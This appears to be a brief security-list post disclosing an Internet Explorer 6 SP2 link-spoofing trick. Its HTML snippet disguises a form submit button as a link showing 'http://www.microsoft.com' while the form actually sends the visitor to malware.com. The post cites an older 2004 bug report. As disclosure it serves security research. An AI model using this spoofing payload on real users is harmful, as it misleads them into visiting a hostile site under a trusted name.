I also want to play <base href="http://www.microsoft.com"> <a href=><form action="http://www.malware.com" method="get"><INPUT style="BORDER-RIGHT: 0pt; BORDER-TOP: 0pt; FONT-SIZE: 10pt; BORDER-LEFT: 0pt; CURSOR: hand; COLOR: blue; BORDER-BOTTOM: 0pt; BACKGROUND-COLOR: transparent;TEXT-DECORATION: underline" type=submit value=http://www.microsoft.com></form></a> This still works in IE 6 SP2 XP 123 whatever, since patched and from back in March 2004 [see: http://www.securityfocus.com/bid/10023 ]. Only difference being the base href and open a href. http://www.malware.com/mwaresoft.html Interestingly Outlook Express gets it right this time. -- http://www.malware.com